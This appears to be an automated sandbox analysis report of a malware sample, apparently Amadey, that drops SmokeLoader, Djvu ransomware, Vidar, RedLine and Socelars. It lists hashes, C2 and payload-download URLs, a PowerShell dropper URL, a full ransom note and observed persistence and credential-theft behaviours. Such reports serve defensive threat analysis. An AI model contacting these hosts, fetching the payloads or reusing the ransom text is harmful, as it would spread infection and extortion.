amadey | b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990

Analysis

max time kernel
149s
max time network
152s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
30-03-2023 15:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
Size

224KB
MD5

404a7c5c03a53b10f0eed922316e6681
SHA1

b7fd402c978bcdc307cdc035d02f12ce56604d3d
SHA256

b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990
SHA512

b92b147ed9036fda5bea9efeedbf0f02aa748aec795532eb659e3aa82187c16c7b8f7972105fc4635591fcc2540213eb8d0685fc54fa075816d581dbf34ff84f
SSDEEP

3072:FlZ8TuCNd3Vhw0vU1xuQHMhyOzBj3e2ekP3gQ9cNsR2+If280:jmf5/XyIbe4gJNsRP

Score

10^/10

amadey djvu redline smokeloader socelars vidar 5df88deb5dde677ba658b77ad5f60248 frtrack pub1 backdoor discovery evasion infostealer persistence ransomware spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.teamtech.info/wp-content/debug2.ps1

Extracted

Family

smokeloader

Version

2022

http://potunulit.org/

http://hutnilior.net/

http://bulimu55t.net/

http://soryytlic4.net/

http://novanosa5org.org/

http://nuljjjnuli.org/

http://tolilolihul.net/

http://somatoka51hub.net/

http://hujukui3.net/

http://bukubuka1.net/

http://golilopaster.org/

http://newzelannd66.org/

http://otriluyttn.org/

http://aapu.at/tmp/

http://poudineh.com/tmp/

http://firsttrusteedrx.ru/tmp/

http://kingpirate.ru/tmp/

rc4.i32

Extracted

Family

djvu

http://zexeq.com/test2/get.php

http://zexeq.com/lancer/get.php

Attributes

extension
.jywd
offline_id
MEMHlobHgXqvmTWaMsLcwGZhDOd00bblO1yevst1
payload_url
http://uaery.top/dl/build2.exe

http://zexeq.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-fkW8qLaCVQ Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0675JOsie

rsa_pubkey.plain

Extracted

Family

vidar

Version

3.2

Botnet

5df88deb5dde677ba658b77ad5f60248

https://steamcommunity.com/profiles/76561199489580435

https://t.me/tabootalks

Attributes

profile_id_v2
5df88deb5dde677ba658b77ad5f60248
user_agent
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 OPR/91.0.4516.79

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

amadey

Version

3.65

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

socelars

https://hdbywe.s3.us-west-2.amazonaws.com/dfgg320/

Extracted

Family

redline

Botnet

frtrack

francestracking.com:80

Attributes

auth_value
f2f94b780071d26409283a3478312faf

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 34 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2068-130-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2068-132-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3304-134-0x0000000004980000-0x0000000004A9B000-memory.dmp	family_djvu
behavioral1/memory/2068-133-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2068-135-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2068-147-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-152-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-153-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-158-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-159-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-161-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4340-168-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4340-169-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4340-174-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-181-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-188-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-190-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-199-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-201-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-206-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-210-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-211-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-212-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-214-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-216-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-217-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4496-218-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-219-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/3772-271-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1244-390-0x0000000004A70000-0x0000000004B8B000-memory.dmp	family_djvu
behavioral1/memory/4788-395-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/4788-399-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1028-461-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1028-761-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

powershell.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	powershell.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4268-932-0x0000000004B10000-0x0000000004B6A000-memory.dmp	family_redline
behavioral1/memory/4268-942-0x0000000007680000-0x00000000076D6000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs

Processes:

XandETC.exeupdater.exe

description	pid	process	target process
PID 4532 created 3204	4532	XandETC.exe	Explorer.EXE
PID 4532 created 3204	4532	XandETC.exe	Explorer.EXE
PID 4532 created 3204	4532	XandETC.exe	Explorer.EXE
PID 4532 created 3204	4532	XandETC.exe	Explorer.EXE
PID 4532 created 3204	4532	XandETC.exe	Explorer.EXE
PID 3056 created 3204	3056	updater.exe	Explorer.EXE
PID 3056 created 3204	3056	updater.exe	Explorer.EXE
PID 3056 created 3204	3056	updater.exe	Explorer.EXE
PID 3056 created 3204	3056	updater.exe	Explorer.EXE

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

83 2252 powershell.exe
84 2252 powershell.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

Explorer.EXE

pid process

3204 Explorer.EXE

flow	pid	process
83	2252	powershell.exe
84	2252	powershell.exe

pid	process
3204	Explorer.EXE

Executes dropped EXE 37 IoCs

Processes:

C2C8.exeC2C8.exeC2C8.exeC2C8.exeD528.exeD528.exeDA88.exeD528.exeDC9C.exebuild2.exeD528.exebuild2.exebuild3.exebuild2.exebuild2.exebuild3.exe358B.exePlayer3.exess31.exeXandETC.exenbveek.exe426D.exe4433.exePlayer3.exe4433.exehanddiy_3.exe4433.exesqlcmd.exe4433.exebuild2.exebuild2.exemstsca.exenbveek.exechrome.exe9C85.exeupdater.exenbveek.exe

pid	process
3304	C2C8.exe
2068	C2C8.exe
4872	C2C8.exe
4496	C2C8.exe
4520	D528.exe
4340	D528.exe
3984	DA88.exe
4416	D528.exe
1004	DC9C.exe
4400	build2.exe
3772	D528.exe
3196	build2.exe
4928	build3.exe
4264	build2.exe
744	build2.exe
1396	build3.exe
1788	358B.exe
1116	Player3.exe
1804	ss31.exe
4532	XandETC.exe
3528	nbveek.exe
4624	426D.exe
1244	4433.exe
4396	Player3.exe
4788	4433.exe
3776	handdiy_3.exe
5000	4433.exe
1480	sqlcmd.exe
1028	4433.exe
5056	build2.exe
5048	build2.exe
424	mstsca.exe
356	nbveek.exe
4932	chrome.exe
4268	9C85.exe
3056	updater.exe
812	nbveek.exe

Loads dropped DLL 7 IoCs

Processes:

build2.exerundll32.exerundll32.exerundll32.exebuild2.exe

pid process

3196 build2.exe
3196 build2.exe
220 rundll32.exe
368 rundll32.exe
4776 rundll32.exe
5048 build2.exe
5048 build2.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4732 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3196	build2.exe
3196	build2.exe
220	rundll32.exe
368	rundll32.exe
4776	rundll32.exe
5048	build2.exe
5048	build2.exe

pid	process
4732	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

C2C8.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\71d38b9a-1941-4d09-bd42-40365ca0c884\\C2C8.exe\" --AutoStart"	C2C8.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

28 api.2ip.ua
34 api.2ip.ua
63 api.2ip.ua
80 api.2ip.ua
9 api.2ip.ua
10 api.2ip.ua
21 api.2ip.ua

flow	ioc
28	api.2ip.ua
34	api.2ip.ua
63	api.2ip.ua
80	api.2ip.ua
9	api.2ip.ua
10	api.2ip.ua
21	api.2ip.ua

Drops file in System32 directory 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

C2C8.exeC2C8.exeD528.exeD528.exebuild2.exebuild2.exe4433.exe4433.exebuild2.exe

description	pid	process	target process
PID 3304 set thread context of 2068	3304	C2C8.exe	C2C8.exe
PID 4872 set thread context of 4496	4872	C2C8.exe	C2C8.exe
PID 4520 set thread context of 4340	4520	D528.exe	D528.exe
PID 4416 set thread context of 3772	4416	D528.exe	D528.exe
PID 4400 set thread context of 3196	4400	build2.exe	build2.exe
PID 4264 set thread context of 744	4264	build2.exe	build2.exe
PID 1244 set thread context of 4788	1244	4433.exe	4433.exe
PID 5000 set thread context of 1028	5000	4433.exe	4433.exe
PID 5056 set thread context of 5048	5056	build2.exe	build2.exe

Drops file in Program Files directory 11 IoCs

Processes:

handdiy_3.exeXandETC.exe

description	ioc	process
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\mode-ecb.js	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json	handdiy_3.exe
File opened for modification	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js	handdiy_3.exe
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\icon.png	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\background.js	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\background.html	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\aes.js	handdiy_3.exe
File created	C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\pad-nopadding.js	handdiy_3.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4092 sc.exe
3056 sc.exe
1168 sc.exe
4152 sc.exe
2544 sc.exe
3348 sc.exe
2684 sc.exe
1096 sc.exe
1852 sc.exe
3248 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

5108 1004 WerFault.exe DC9C.exe
4408 4624 WerFault.exe 426D.exe
4376 368 WerFault.exe rundll32.exe

pid	process
4092	sc.exe
3056	sc.exe
1168	sc.exe
4152	sc.exe
2544	sc.exe
3348	sc.exe
2684	sc.exe
1096	sc.exe
1852	sc.exe
3248	sc.exe

pid	pid_target	process	target process
5108	1004	WerFault.exe	DC9C.exe
4408	4624	WerFault.exe	426D.exe
4376	368	WerFault.exe	rundll32.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exeDA88.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DA88.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DA88.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DA88.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

build2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	build2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	build2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3536 schtasks.exe
2252 schtasks.exe
2444 schtasks.exe
3536 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1096 timeout.exe

pid	process
3536	schtasks.exe
2252	schtasks.exe
2444	schtasks.exe
3536	schtasks.exe

pid	process
1096	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2360 taskkill.exe

pid	process
2360	taskkill.exe

Modifies data under HKEY_USERS 49 IoCs

Processes:

powershell.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133246707136097594"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1092 PING.EXE

pid	process
1092	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exeExplorer.EXE

pid	process
4144	b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
4144	b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE
3204	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3204 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exeDA88.exe

pid process

4144 b7c7eb65ab4b2d56462cdbd5894b4f861b3a717b01823b05a168eccc31628990.exe
3984 DA88.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

3224 chrome.exe
3224 chrome.exe
3224 chrome.exe
3224 chrome.exe

pid	process
3204	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEhanddiy_3.exe

description	pid	process
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeShutdownPrivilege	3204	Explorer.EXE
Token: SeCreatePagefilePrivilege	3204	Explorer.EXE
Token: SeCreateTokenPrivilege	3776	handdiy_3.exe
Token: SeAssignPrimaryTokenPrivilege	3776	handdiy_3.exe
Token: SeLockMemoryPrivilege	3776	handdiy_3.exe
Token: SeIncreaseQuotaPrivilege	3776	handdiy_3.exe
Token: SeMachineAccountPrivilege	3776	handdiy_3.exe
Token: SeTcbPrivilege	3776	handdiy_3.exe
Token: SeSecurityPrivilege	3776	handdiy_3.exe
Token: SeTakeOwnershipPrivilege	3776	handdiy_3.exe
Token: SeLoadDriverPrivilege	3776	handdiy_3.exe
Token: SeSystemProfilePrivilege	3776	handdiy_3.exe
Token: SeSystemtimePrivilege	3776	handdiy_3.exe
Token: SeProfSingleProcessPrivilege	3776	handdiy_3.exe
